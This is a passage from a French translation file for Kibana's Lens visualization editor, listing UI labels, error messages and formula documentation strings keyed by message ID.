"xpack.lens.indexPattern.overall_average.documentation.markdown": "\nCalcule la moyenne d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_average\" calcule la moyenne pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : écart par rapport à la moyenne :\n\"sum(bytes) - overall_average(sum(bytes))\"\n ", - "xpack.lens.indexPattern.overall_max.documentation.markdown": "\nCalcule la valeur maximale d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_max\" calcule la valeur maximale pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de plage\n\"(sum(bytes) - overall_min(sum(bytes))) / (overall_max(sum(bytes)) - overall_min(sum(bytes)))\"\n ", - "xpack.lens.indexPattern.overall_min.documentation.markdown": "\nCalcule la valeur minimale d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_min\" calcule la valeur minimale pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de plage\n\"(sum(bytes) - overall_min(sum(bytes)) / (overall_max(sum(bytes)) - overall_min(sum(bytes)))\"\n ", - "xpack.lens.indexPattern.overall_sum.documentation.markdown": "\nCalcule la somme d'un indicateur pour tous les points de données d'une série dans le graphique actuel. Une série est définie par une dimension à l'aide d'un histogramme de dates ou d'une fonction d'intervalle.\nD'autres dimensions permettant de répartir les données telles que les valeurs supérieures ou les filtres sont traitées en tant que séries distinctes.\n\nSi le graphique actuel n'utilise aucun histogramme de dates ou aucune fonction d'intervalle, \"overall_sum\" calcule la somme pour toutes les dimensions, quelle que soit la fonction utilisée.\n\nExemple : pourcentage de total\n\"sum(bytes) / overall_sum(sum(bytes))\"\n ", - "xpack.lens.indexPattern.percentile.documentation.markdown": "\nRenvoie le centile spécifié des valeurs d'un champ. Il s'agit de la valeur de n pour cent des valeurs présentes dans les documents.\n\nExemple : obtenir le nombre d'octets supérieurs à 95 % des valeurs :\n`percentile(bytes, percentile=95)`\n ", - "xpack.lens.indexPattern.time_scale.documentation.markdown": "\n\nCette fonction avancée est utile pour normaliser les comptes et les sommes sur un intervalle de temps spécifique. Elle permet l'intégration avec les indicateurs qui sont stockés déjà normalisés sur un intervalle de temps spécifique.\n\nVous pouvez faire appel à cette fonction uniquement si une fonction d'histogramme des dates est utilisée dans le graphique actuel.\n\nExemple : Un rapport comparant un indicateur déjà normalisé à un autre indicateur devant être normalisé.\n\"normalize_by_unit(counter_rate(max(system.diskio.write.bytes)), unit='s') / last_value(apache.status.bytes_per_second)\"\n ", - "xpack.lens.advancedSettings.useFieldExistenceSampling.description": "Lorsque cette option est activée, l’échantillonnage de document est utilisé pour déterminer l’existence des champs (disponibles ou vides) pour la liste de champs Lens au lieu de se fonder sur les mappings d’index.", - "xpack.lens.advancedSettings.useFieldExistenceSampling.title": "Utiliser l’échantillonnage d’existence des champs", - "xpack.lens.app.addToLibrary": "Enregistrer dans la bibliothèque", - "xpack.lens.app.cancel": "Annuler", - "xpack.lens.app.cancelButtonAriaLabel": "Retour à la dernière application sans enregistrer les modifications", - "xpack.lens.app.docLoadingError": "Erreur lors du chargement du document enregistré", - "xpack.lens.app.downloadButtonAriaLabel": "Télécharger les données en fichier CSV", - "xpack.lens.app.downloadButtonFormulasWarning": "Votre fichier CSV contient des caractères que les applications de feuilles de calcul pourraient considérer comme des formules.", - "xpack.lens.app.downloadCSV": "Télécharger au format CSV", - "xpack.lens.app.exploreDataInDiscover": "Explorer les données dans Discover", - "xpack.lens.app.exploreDataInDiscoverDrilldown": "Ouvrir dans Discover", - "xpack.lens.app.exploreDataInDiscoverDrilldown.newTabConfig": "Ouvrir dans un nouvel onglet", - "xpack.lens.app.goBackLabel": "Retour vers {contextOriginatingApp}", - "xpack.lens.app.goBackModalCancelBtn": "Annuler", - "xpack.lens.app.goBackModalMessage": "Les modifications que vous avez effectuées ici ne sont pas rétrocompatibles avec votre visualisation {contextOriginatingApp} d’origine. Êtes-vous sûr de vouloir abandonner ces modifications non enregistrées et revenir à {contextOriginatingApp} ?", - "xpack.lens.app.goBackModalTitle": "Abandonner les modifications ?", - "xpack.lens.app.inspect": "Inspecter", - "xpack.lens.app.inspectAriaLabel": "inspecter", - "xpack.lens.app.lensContext": "Contexte Lens ({language})", - "xpack.lens.app.save": "Enregistrer", - "xpack.lens.app.saveAndReturn": "Enregistrer et revenir", - "xpack.lens.app.saveAndReturnButtonAriaLabel": "Enregistrer la visualisation Lens en cours et revenir à l'application précédente", - "xpack.lens.app.saveAs": "Enregistrer sous", - "xpack.lens.app.saveButtonAriaLabel": "Enregistrer la visualisation Lens en cours", - "xpack.lens.app.saveModalType": "Visualisation Lens", - "xpack.lens.app.saveVisualization.successNotificationText": "\"{visTitle}\" enregistré", - "xpack.lens.app.settings": "Paramètres", - "xpack.lens.app.settingsAriaLabel": "Ouvrir le menu de paramètres Lens", - "xpack.lens.app.showUnderlyingDataMultipleLayers": "Impossible d’afficher les données sous-jacentes pour les visualisations avec plusieurs calques.", - "xpack.lens.app.showUnderlyingDataNoData": "La visualisation ne comprend aucune donnée disponible à afficher.", - "xpack.lens.app.showUnderlyingDataTimeShifts": "Impossible d’afficher les données sous-jacentes lorsqu’un décalage temporel est configuré.", - "xpack.lens.app.showUnderlyingDataUnsupportedDatasource": "Les données sous-jacentes sont incompatibles avec la source de données actuelle.", - "xpack.lens.app.unsavedFilename": "non enregistré", - "xpack.lens.app.unsavedWorkConfirmBtn": "Abandonner les modifications", - "xpack.lens.app.unsavedWorkMessage": "Quitter Lens avec un travail non enregistré ?", - "xpack.lens.app.unsavedWorkTitle": "Modifications non enregistrées", - "xpack.lens.app.updatePanel": "Mettre à jour le panneau sur {originatingAppName}", - "xpack.lens.app404": "404 Page introuvable", - "xpack.lens.appName": "Visualisation Lens", - "xpack.lens.breadcrumbsByValue": "Modifier la visualisation", - "xpack.lens.breadcrumbsCreate": "Créer", - "xpack.lens.breadcrumbsTitle": "Bibliothèque Visualize", - "xpack.lens.chart.labelVisibility.auto": "Auto", - "xpack.lens.chart.labelVisibility.custom": "Personnalisé", - "xpack.lens.chart.labelVisibility.none": "Aucun", - "xpack.lens.chartSwitch.dataLossDescription": "La sélection de ce type de visualisation entraîne la suppression des options de configuration incompatibles et des calques multiples, le cas échéant.", - "xpack.lens.chartSwitch.dataLossLabel": "Avertissement", - "xpack.lens.chartSwitch.experimentalLabel": "Version d’évaluation technique", - "xpack.lens.chartSwitch.noResults": "Résultats introuvables pour {term}.", - "xpack.lens.chartTitle.unsaved": "Visualisation non enregistrée", - "xpack.lens.chartWarnings.number": "{warningsCount, plural, one {avertissement} other {avertissements}}", - "xpack.lens.collapse.avg": "Moyenne", - "xpack.lens.collapse.infoIcon": "Ne pas afficher cette dimension dans la visualisation et agréger toutes les valeurs d'indicateurs ayant la même valeur pour cette dimension en un nombre unique.", - "xpack.lens.collapse.label": "Réduire par", - "xpack.lens.collapse.max": "Max.", - "xpack.lens.collapse.min": "Min.", - "xpack.lens.collapse.none": "Aucun", - "xpack.lens.collapse.sum": "Somme", - "xpack.lens.configPanel.addLayerButton": "Ajouter un calque", - "xpack.lens.configPanel.color.tooltip.auto": "Lens choisit automatiquement des couleurs à votre place sauf si vous spécifiez une couleur personnalisée.", - "xpack.lens.configPanel.color.tooltip.custom": "Effacez la couleur personnalisée pour revenir au mode \"Auto\".", - "xpack.lens.configPanel.color.tooltip.disabled": "Les séries individuelles n'acceptent pas les couleurs personnalisées lorsque le calque inclut l'option \"Répartir par\".", - "xpack.lens.configPanel.experimentalLabel": "Version d'évaluation technique", - "xpack.lens.configPanel.selectLayerType": "Sélectionner le type de calque", - "xpack.lens.configPanel.selectVisualization": "Sélectionner une visualisation", - "xpack.lens.configPanel.visualizationType": "Type de visualisation", - "xpack.lens.configure.configurePanelTitle": "{groupLabel}", - "xpack.lens.configure.editConfig": "Modifier la configuration {label}", - "xpack.lens.configure.emptyConfig": "Ajouter ou glisser-déposer un champ", - "xpack.lens.configure.emptyConfigClick": "Ajouter une annotation", - "xpack.lens.configure.invalidBottomReferenceLineDimension": "La ligne de référence est affectée à un axe qui n’existe plus ou qui n’est plus valide. Vous pouvez déplacer cette ligne de référence vers un autre axe disponible ou la supprimer.", - "xpack.lens.configure.invalidConfigTooltip": "Configuration non valide.", - "xpack.lens.configure.invalidConfigTooltipClick": "Cliquez pour en savoir plus.", - "xpack.lens.configure.invalidReferenceLineDimension": "La ligne de référence est affectée à un axe qui n’existe plus. Vous pouvez déplacer cette ligne de référence vers un autre axe disponible ou la supprimer.", - "xpack.lens.configure.suggestedValuee": "Valeur suggérée : {value}", - "xpack.lens.confirmModal.cancelButtonLabel": "Annuler", - "xpack.lens.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}", - "xpack.lens.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?", - "xpack.lens.customBucketContainer.dragToReorder": "Faire glisser pour réorganiser", - "xpack.lens.dataPanelWrapper.switchDatasource": "Basculer vers la source de données", - "xpack.lens.datatable.addLayer": "Visualisation", - "xpack.lens.datatable.breakdownColumns": "Colonnes", - "xpack.lens.datatable.breakdownColumns.description": "Divisez les colonnes d'indicateurs par champ. Il est recommandé de conserver un faible nombre de colonnes pour éviter le défilement horizontal.", - "xpack.lens.datatable.breakdownRows": "Lignes", - "xpack.lens.datatable.breakdownRows.description": "Divisez le tableau par champ. Cette opération est recommandée pour les répartitions à cardinalité élevée.", - "xpack.lens.datatable.column.help": "Colonne de tableau de données", - "xpack.lens.datatable.conjunctionSign": " & ", - "xpack.lens.datatable.expressionHelpLabel": "Outil de rendu de tableaux de données", - "xpack.lens.datatable.groupLabel": "Tabulaire", - "xpack.lens.datatable.label": "Tableau", - "xpack.lens.datatable.metrics": "Indicateurs", - "xpack.lens.datatable.suggestionLabel": "En tant que tableau", - "xpack.lens.datatable.titleLabel": "Titre", - "xpack.lens.datatable.visualizationName": "Tableau de données", - "xpack.lens.datatable.visualizationOf": "Tableau {operations}", - "xpack.lens.datatypes.boolean": "booléen", - "xpack.lens.datatypes.date": "date", - "xpack.lens.datatypes.geoPoint": "geo_point", - "xpack.lens.datatypes.geoShape": "geo_shape", - "xpack.lens.datatypes.histogram": "histogramme", - "xpack.lens.datatypes.ipAddress": "IP", - "xpack.lens.datatypes.murmur3": "murmur3", - "xpack.lens.datatypes.number": "numéro", - "xpack.lens.datatypes.record": "enregistrement", - "xpack.lens.datatypes.string": "chaîne", - "xpack.lens.deleteLayerAriaLabel": "Supprimer le calque {index}", - "xpack.lens.dimensionContainer.close": "Fermer", - "xpack.lens.dimensionContainer.closeConfiguration": "Fermer la configuration", - "xpack.lens.discover.visualizeFieldLegend": "Visualiser le champ", - "xpack.lens.dragDrop.altOption": "Alt/Option", - "xpack.lens.dragDrop.announce.cancelled": "Mouvement annulé. {label} revenu à sa position initiale", - "xpack.lens.dragDrop.announce.cancelledItem": "Mouvement annulé. {label} revenu au groupe {groupLabel} à la position {position}", - "xpack.lens.dragDrop.announce.combine.short": " Maintenir la touche Contrôle enfoncée pour combiner", - "xpack.lens.dragDrop.announce.dropped.reordered": "{label} réorganisé dans le groupe {groupLabel} de la position {prevPosition} à la position {position}", - "xpack.lens.dragDrop.announce.droppedNoPosition": "{label} ajouté à {dropLabel}", - "xpack.lens.dragDrop.announce.duplicate.short": " Maintenez la touche Alt ou Option enfoncée pour dupliquer.", - "xpack.lens.dragDrop.announce.lifted": "{label} levé", - "xpack.lens.dragDrop.announce.selectedTarget.defaultNoPosition": "Ajoutez {label} à {dropLabel}. Appuyer sur la barre d'espace ou sur Entrée pour ajouter", - "xpack.lens.dragDrop.announce.selectedTarget.noSelected": "Aucune cible sélectionnée. Utiliser les touches fléchées pour sélectionner une cible", - "xpack.lens.dragDrop.announce.selectedTarget.reordered": "Réorganisez {label} dans le groupe {groupLabel} de la position {prevPosition} à la position {position}. Appuyer sur la barre d'espace ou sur Entrée pour réorganiser", - "xpack.lens.dragDrop.announce.selectedTarget.reorderedBack": "{label} revenu à sa position initiale {prevPosition}", - "xpack.lens.dragDrop.announce.swap.short": " Maintenez la touche Maj enfoncée pour permuter.", - "xpack.lens.dragDrop.combine": "Combiner", - "xpack.lens.dragDrop.control": "Contrôler", - "xpack.lens.dragDrop.duplicate": "Dupliquer", - "xpack.lens.dragDrop.keyboardInstructions": "Appuyez sur la barre d'espace ou sur Entrée pour commencer à faire glisser. Lors du glissement, utilisez les touches fléchées gauche/droite pour vous déplacer entre les cibles de dépôt. Appuyez à nouveau sur la barre d'espace ou sur Entrée pour terminer.", - "xpack.lens.dragDrop.keyboardInstructionsReorder": "Appuyez sur la barre d'espace ou sur Entrée pour commencer à faire glisser. Lors du glissement, utilisez les touches fléchées haut/bas pour réorganiser les éléments dans le groupe et les touches gauche/droite pour choisir les cibles de dépôt à l'extérieur du groupe. Appuyez à nouveau sur la barre d'espace ou sur Entrée pour terminer.", - "xpack.lens.dragDrop.shift": "Déplacer", - "xpack.lens.dragDrop.swap": "Permuter", - "xpack.lens.editorFrame.aggregateIndicatorLabel": "Cette dimension n'est pas visible dans le graphique car toutes les valeurs individuelles sont agrégées en une valeur unique", - "xpack.lens.editorFrame.applyChanges": "Appliquer les modifications", - "xpack.lens.editorFrame.applyChangesLabel": "Appliquer les modifications", - "xpack.lens.editorFrame.applyChangesWorkspacePrompt": "Appliquer les modifications pour générer le rendu de la visualisation", - "xpack.lens.editorFrame.buildExpressionError": "Une erreur inattendue s'est produite lors de la préparation du graphique", - "xpack.lens.editorFrame.colorIndicatorLabel": "Couleur de cette dimension : {hex}", - "xpack.lens.editorFrame.configurationFailureMoreErrors": " +{errors} {errors, plural, one {erreur} other {erreurs}}", - "xpack.lens.editorFrame.dataFailure": "Une erreur s'est produite lors du chargement des données.", - "xpack.lens.editorFrame.dataViewNotFound": "Vue de données introuvable", - "xpack.lens.editorFrame.dataViewReconfigure": "Recréez-la dans la page de gestion des vues de données.", - "xpack.lens.editorFrame.emptyWorkspace": "Déposer quelques champs ici pour commencer", - "xpack.lens.editorFrame.emptyWorkspaceHeading": "Lens est l’éditeur recommandé pour la création de visualisations.", - "xpack.lens.editorFrame.emptyWorkspaceSimple": "Déposer le champ ici", - "xpack.lens.editorFrame.expandRenderingErrorButton": "Afficher les détails de l'erreur", - "xpack.lens.editorFrame.expressionFailure": "Une erreur s'est produite dans l'expression", - "xpack.lens.editorFrame.expressionFailureMessage": "Erreur de requête : {type}, {reason}", - "xpack.lens.editorFrame.expressionFailureMessageWithContext": "Erreur de requête : {type}, {reason} dans {context}", - "xpack.lens.editorFrame.expressionMissingDatasource": "Impossible de trouver la source de données pour la visualisation", - "xpack.lens.editorFrame.expressionMissingDataView": "{count, plural, one {Vue de données introuvable} other {Vues de données introuvables}} : {ids}.", - "xpack.lens.editorFrame.expressionMissingVisualizationType": "Type de visualisation non trouvé.", - "xpack.lens.editorFrame.goToForums": "Formuler des requêtes et donner un retour", - "xpack.lens.editorFrame.invisibleIndicatorLabel": "Cette dimension n'est pas visible actuellement dans le graphique", - "xpack.lens.editorFrame.networkErrorMessage": "Erreur réseau, réessayez plus tard ou contactez votre administrateur.", - "xpack.lens.editorFrame.noColorIndicatorLabel": "Cette dimension n'a pas de couleur individuelle", - "xpack.lens.editorFrame.optionalDimensionLabel": "Facultatif", - "xpack.lens.editorFrame.paletteColorIndicatorLabel": "Cette dimension utilise une palette", - "xpack.lens.editorFrame.previewErrorLabel": "L'aperçu du rendu a échoué", - "xpack.lens.editorFrame.requiresFieldWarningLabel": "Nécessite un champ.", - "xpack.lens.editorFrame.requiresTwoOrMoreFieldsWarningLabel": "Nécessite des champs {requiredMinDimensionCount}.", - "xpack.lens.editorFrame.suggestionPanelTitle": "Suggestions", - "xpack.lens.editorFrame.workspaceLabel": "Espace de travail", - "xpack.lens.embeddable.failure": "Impossible d'afficher la visualisation", - "xpack.lens.embeddable.fixErrors": "Effectuez des modifications dans l'éditeur Lens pour corriger l'erreur", - "xpack.lens.embeddable.legacyURLConflict.shortMessage": "Vous avez rencontré un conflit d’URL.", - "xpack.lens.embeddable.missingTimeRangeParam.longMessage": "La propriété timeRange est requise pour cette configuration.", - "xpack.lens.embeddable.missingTimeRangeParam.shortMessage": "Propriété timeRange manquante", - "xpack.lens.embeddable.moreErrors": "Effectuez des modifications dans l'éditeur Lens pour afficher plus d'erreurs", - "xpack.lens.embeddableDisplayName": "lens", - "xpack.lens.endValue.nearest": "La plus proche", - "xpack.lens.endValue.none": "Masquer", - "xpack.lens.endValue.zero": "Zéro", - "xpack.lens.endValueDescription.nearest": "Étendre la série avec la première/dernière valeur au bord du graphique", - "xpack.lens.endValueDescription.none": "Ne pas étendre la série au bord du graphique", - "xpack.lens.endValueDescription.zero": "Étendre la série au bord du graphique avec la valeur zéro", - "xpack.lens.fieldFormats.longSuffix.d": "par jour", - "xpack.lens.fieldFormats.longSuffix.h": "par heure", - "xpack.lens.fieldFormats.longSuffix.m": "par minute", - "xpack.lens.fieldFormats.longSuffix.s": "par seconde", - "xpack.lens.fieldFormats.suffix.d": "/d", - "xpack.lens.fieldFormats.suffix.h": "/h", - "xpack.lens.fieldFormats.suffix.m": "/m", - "xpack.lens.fieldFormats.suffix.s": "/s", - "xpack.lens.fieldFormats.suffix.title": "Suffixe", - "xpack.lens.fittingFunctionsDescription.carry": "Remplit les blancs avec la dernière valeur", - "xpack.lens.fittingFunctionsDescription.linear": "Remplit les blancs avec une ligne", - "xpack.lens.fittingFunctionsDescription.lookahead": "Remplit les blancs avec la valeur suivante", - "xpack.lens.fittingFunctionsDescription.none": "Ne remplit pas les blancs", - "xpack.lens.fittingFunctionsDescription.zero": "Remplit les blancs avec des zéros", - "xpack.lens.fittingFunctionsTitle.carry": "Dernier", - "xpack.lens.fittingFunctionsTitle.linear": "Linéaire", - "xpack.lens.fittingFunctionsTitle.lookahead": "Suivant", - "xpack.lens.fittingFunctionsTitle.none": "Masquer", - "xpack.lens.fittingFunctionsTitle.zero": "Zéro", - "xpack.lens.formula.base": "base", - "xpack.lens.formula.decimals": "décimales", - "xpack.lens.formula.disableWordWrapLabel": "Désactiver le renvoi à la ligne des mots", - "xpack.lens.formula.editorHelpInlineHideLabel": "Masquer la référence des fonctions", - "xpack.lens.formula.editorHelpInlineHideToolTip": "Masquer la référence des fonctions", - "xpack.lens.formula.editorHelpInlineShowToolTip": "Afficher la référence des fonctions", - "xpack.lens.formula.editorHelpOverlayToolTip": "Référence des fonctions", - "xpack.lens.formula.fullScreenEnterLabel": "Développer", - "xpack.lens.formula.fullScreenExitLabel": "Réduire", - "xpack.lens.formula.kqlExtraArguments": "[kql]?: string, [lucene]?: string", - "xpack.lens.formula.left": "gauche", - "xpack.lens.formula.max": "max", - "xpack.lens.formula.min": "min", - "xpack.lens.formula.number": "numéro", - "xpack.lens.formula.optionalArgument": "Facultatif. La valeur par défaut est {defaultValue}", - "xpack.lens.formula.requiredArgument": "Requis", - "xpack.lens.formula.right": "droite", - "xpack.lens.formula.shiftExtraArguments": "[shift]?: string", - "xpack.lens.formula.string": "chaîne", - "xpack.lens.formula.value": "valeur", - "xpack.lens.formulaCommonFormulaDocumentation": "Les formules les plus courantes divisent deux valeurs pour produire un pourcentage. Pour obtenir un affichage correct, définissez \"Format de valeur\" sur \"pourcent\".", - "xpack.lens.formulaDocumentation.columnCalculationSection": "Calculs de colonnes", - "xpack.lens.formulaDocumentation.columnCalculationSectionDescription": "Ces fonctions sont exécutées pour chaque ligne, mais elles sont fournies avec la colonne entière comme contexte. Elles sont également appelées fonctions de fenêtre.", - "xpack.lens.formulaDocumentation.elasticsearchSection": "Elasticsearch", - "xpack.lens.formulaDocumentation.elasticsearchSectionDescription": "Ces fonctions seront exécutées sur les documents bruts pour chaque ligne du tableau résultant, en agrégeant tous les documents correspondant aux dimensions de répartition en une seule valeur.", - "xpack.lens.formulaDocumentation.filterRatio": "Rapport de filtre", - "xpack.lens.formulaDocumentation.header": "Référence de formule", - "xpack.lens.formulaDocumentation.mathSection": "Mathématique", - "xpack.lens.formulaDocumentation.mathSectionDescription": "Ces fonctions seront exécutées pour chaque ligne du tableau résultant en utilisant des valeurs uniques de la même ligne calculées à l'aide d'autres fonctions.", - "xpack.lens.formulaDocumentation.percentOfTotal": "Pourcentage du total", - "xpack.lens.formulaDocumentation.weekOverWeek": "Semaine après semaine", - "xpack.lens.formulaDocumentationHeading": "Fonctionnement", - "xpack.lens.formulaEnableWordWrapLabel": "Activer le renvoi à la ligne des mots", - "xpack.lens.formulaErrorCount": "{count} {count, plural, one {erreur} other {erreurs}}", - "xpack.lens.formulaExampleMarkdown": "Exemples", - "xpack.lens.formulaFrequentlyUsedHeading": "Formules courantes", - "xpack.lens.formulaPlaceholderText": "Saisissez une formule en combinant des fonctions avec la fonction mathématique, telle que :", - "xpack.lens.formulaSearchPlaceholder": "Rechercher des fonctions", - "xpack.lens.formulaWarningCount": "{count} {count, plural, one {avertissement} other {avertissements}}", - "xpack.lens.functions.collapse.args.byHelpText": "Colonnes selon lesquelles effectuer le regroupement - ces colonnes sont conservées telles quelles", - "xpack.lens.functions.collapse.args.fnHelpText": "Fonction agrégée à appliquer", - "xpack.lens.functions.collapse.args.metricHelpText": "Colonne pour laquelle calculer la fonction agrégée spécifiée", - "xpack.lens.functions.collapse.help": "Réduisez plusieurs lignes en une ligne unique à l'aide de la fonction agrégée spécifiée.", - "xpack.lens.functions.counterRate.args.byHelpText": "Colonne selon laquelle le calcul du taux de compteur sera divisé", - "xpack.lens.functions.counterRate.args.inputColumnIdHelpText": "Colonne pour laquelle le taux de compteur sera calculé", - "xpack.lens.functions.counterRate.args.outputColumnIdHelpText": "Colonne dans laquelle le taux de compteur résultant sera stocké", - "xpack.lens.functions.counterRate.args.outputColumnNameHelpText": "Nom de la colonne dans laquelle le taux de compteur résultant sera stocké", - "xpack.lens.functions.counterRate.help": "Calcule le taux de compteur d'une colonne dans un tableau de données", - "xpack.lens.functions.lastValue.missingSortField": "Cette vue de données ne contient aucun champ de date.", - "xpack.lens.functions.timeScale.dateColumnMissingMessage": "L'ID de colonne de date {columnId} n'existe pas.", - "xpack.lens.functions.timeScale.timeInfoMissingMessage": "Impossible de récupérer les informations d'histogramme des dates", - "xpack.lens.gauge.addLayer": "Visualisation", - "xpack.lens.gauge.appearanceLabel": "Apparence", - "xpack.lens.gauge.dynamicColoring.label": "Couleurs de bande", - "xpack.lens.gauge.gaugeLabel": "Jauge", - "xpack.lens.gauge.goalValueLabel": "Valeur de l’objectif", - "xpack.lens.gauge.maxValueLabel": "Valeur maximale", - "xpack.lens.gauge.metricLabel": "Indicateur", - "xpack.lens.gauge.minValueLabel": "Valeur minimale", - "xpack.lens.gaugeHorizontal.gaugeLabel": "Horizontal à jauge", - "xpack.lens.gaugeVertical.gaugeLabel": "Vertical à jauge", - "xpack.lens.gaugeVisualization.goalValueGreaterMaximumShortMessage": "La valeur de l’objectif est supérieure à la valeur maximale.", - "xpack.lens.gaugeVisualization.metricValueGreaterMaximumShortMessage": "La valeur de l’indicateur est supérieure à la valeur maximale.", - "xpack.lens.gaugeVisualization.minimumValueGreaterGoalShortMessage": "La valeur minimale est supérieure à la valeur de l’objectif.", - "xpack.lens.gaugeVisualization.minValueGreaterMetricShortMessage": "La valeur minimale est supérieure à la valeur de l’indicateur.", - "xpack.lens.geoFieldWorkspace.dropMessage": "Déposer le champ ici pour l'ouvrir dans Maps", - "xpack.lens.geoFieldWorkspace.dropZoneLabel": "zone de dépôt pour ouvrir dans Maps", - "xpack.lens.guageVisualization.chartCannotRenderEqual": "Les valeurs minimale et maximale peuvent ne pas être égales.", - "xpack.lens.guageVisualization.chartCannotRenderMinGreaterMax": "La valeur minimale peut ne pas être supérieure à la valeur maximale.", - "xpack.lens.heatmap.addLayer": "Visualisation", - "xpack.lens.heatmap.cellValueLabel": "Valeur de cellule", - "xpack.lens.heatmap.groupLabel": "Carte thermique", - "xpack.lens.heatmap.heatmapLabel": "Carte thermique", - "xpack.lens.heatmap.horizontalAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe horizontal est activé.", - "xpack.lens.heatmap.horizontalAxisLabel": "Axe horizontal", - "xpack.lens.heatmap.verticalAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe vertical est activé.", - "xpack.lens.heatmap.verticalAxisLabel": "Axe vertical", - "xpack.lens.heatmapChart.legendVisibility.hide": "Masquer", - "xpack.lens.heatmapChart.legendVisibility.show": "Afficher", - "xpack.lens.heatmapVisualization.arrayValuesWarningMessage": "{label} contient des valeurs de tableau. Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.heatmapVisualization.heatmapGroupLabel": "Magnitude", - "xpack.lens.heatmapVisualization.heatmapLabel": "Carte thermique", - "xpack.lens.heatmapVisualization.missingXAccessorLongMessage": "La configuration de l'axe horizontal est manquante.", - "xpack.lens.heatmapVisualization.missingXAccessorShortMessage": "Axe horizontal manquant.", - "xpack.lens.indexPattern.addColumnAriaLabel": "Ajouter ou glisser-déposer un champ dans {groupLabel}", - "xpack.lens.indexPattern.addColumnAriaLabelClick": "Ajouter une annotation à {groupLabel}", - "xpack.lens.indexPattern.advancedSettings": "Ajouter des options avancées", - "xpack.lens.indexPattern.allFieldsLabel": "Tous les champs", - "xpack.lens.indexPattern.allFieldsLabelHelp": "Glissez-déposez les champs disponibles dans l’espace de travail et créez des visualisations. Pour modifier les champs disponibles, sélectionnez une vue de données différente, modifiez vos requêtes ou utilisez une plage temporelle différente. Certains types de champ ne peuvent pas être visualisés dans Lens, y compris les champ de texte intégral et champs géographiques.", - "xpack.lens.indexPattern.allFieldsSamplingLabelHelp": "Les champs disponibles contiennent les données des 500 premiers documents correspondant aux filtres. Pour afficher tous les filtres, développez les champs vides. Vous ne pouvez pas créer de visualisations avec des champs de texte intégral, géographiques, lissés et d’objet.", - "xpack.lens.indexPattern.ascendingCountPrecisionErrorWarning": "{name} pour cette visualisation peut être approximatif en raison de la manière dont les données sont indexées. Essayez de trier par rareté plutôt que par nombre ascendant d’enregistrements. Pour en savoir plus sur cette limitation, {link}.", - "xpack.lens.indexPattern.ascendingCountPrecisionErrorWarning.link": "veuillez consulter la documentation", - "xpack.lens.indexPattern.autoIntervalLabel": "Auto ({interval})", - "xpack.lens.indexPattern.availableFieldsLabel": "Champs disponibles", - "xpack.lens.indexPattern.avg": "Moyenne", - "xpack.lens.indexPattern.avg.description": "Agrégation d'indicateurs à valeur unique qui calcule la moyenne des valeurs numériques extraites des documents agrégés", - "xpack.lens.indexPattern.avgOf": "Moyenne de {name}", - "xpack.lens.indexPattern.bytesFormatLabel": "Octets (1024)", - "xpack.lens.indexPattern.calculations.dateHistogramErrorMessage": "{name} requiert un histogramme des dates pour fonctionner. Ajoutez un histogramme des dates ou sélectionnez une autre fonction.", - "xpack.lens.indexPattern.calculations.layerDataType": "{name} est désactivé pour ce type de calque.", - "xpack.lens.indexPattern.cardinality": "Compte unique", - "xpack.lens.indexPattern.cardinality.signature": "champ : chaîne", - "xpack.lens.indexPattern.cardinalityOf": "Compte unique de {name}", - "xpack.lens.indexPattern.changeDataViewTitle": "Vue de données", - "xpack.lens.indexPattern.chooseField": "Champ", - "xpack.lens.indexPattern.chooseFieldLabel": "Pour utiliser cette fonction, sélectionnez un champ.", - "xpack.lens.indexPattern.chooseSubFunction": "Choisir une sous-fonction", - "xpack.lens.indexPattern.columnFormatLabel": "Format de valeur", - "xpack.lens.indexPattern.columnLabel": "Nom", - "xpack.lens.indexPattern.count": "Décompte", - "xpack.lens.indexPattern.counterRate": "Taux de compteur", - "xpack.lens.indexPattern.counterRate.signature": "indicateur : nombre", - "xpack.lens.indexPattern.CounterRateOf": "Taux de compteur de {name}", - "xpack.lens.indexPattern.countOf": "Nombre d'enregistrements", - "xpack.lens.indexPattern.cumulative_sum.signature": "indicateur : nombre", - "xpack.lens.indexPattern.cumulativeSum": "Somme cumulée", - "xpack.lens.indexPattern.cumulativeSumOf": "Somme cumulée de {name}", - "xpack.lens.indexPattern.dataViewLoadError": "Erreur lors du chargement de la vue de données", - "xpack.lens.indexPattern.dateHistogram": "Histogramme des dates", - "xpack.lens.indexPattern.dateHistogram.autoAdvancedExplanation": "L'intervalle suit cette logique :", - "xpack.lens.indexPattern.dateHistogram.autoBasicExplanation": "L'histogramme des dates automatique divise un champ de données en groupes par intervalle.", - "xpack.lens.indexPattern.dateHistogram.autoBoundHeader": "Intervalle cible mesuré", - "xpack.lens.indexPattern.dateHistogram.autoIntervalHeader": "Intervalle utilisé", - "xpack.lens.indexPattern.dateHistogram.autoLongerExplanation": "Pour choisir l'intervalle, Lens divise la plage temporelle spécifiée par le paramètre {targetBarSetting}. Lens calcule le meilleur intervalle pour vos données. Par exemple 30m, 1h et 12. Le nombre maximal de barres est défini par la valeur {maxBarSetting}.", - 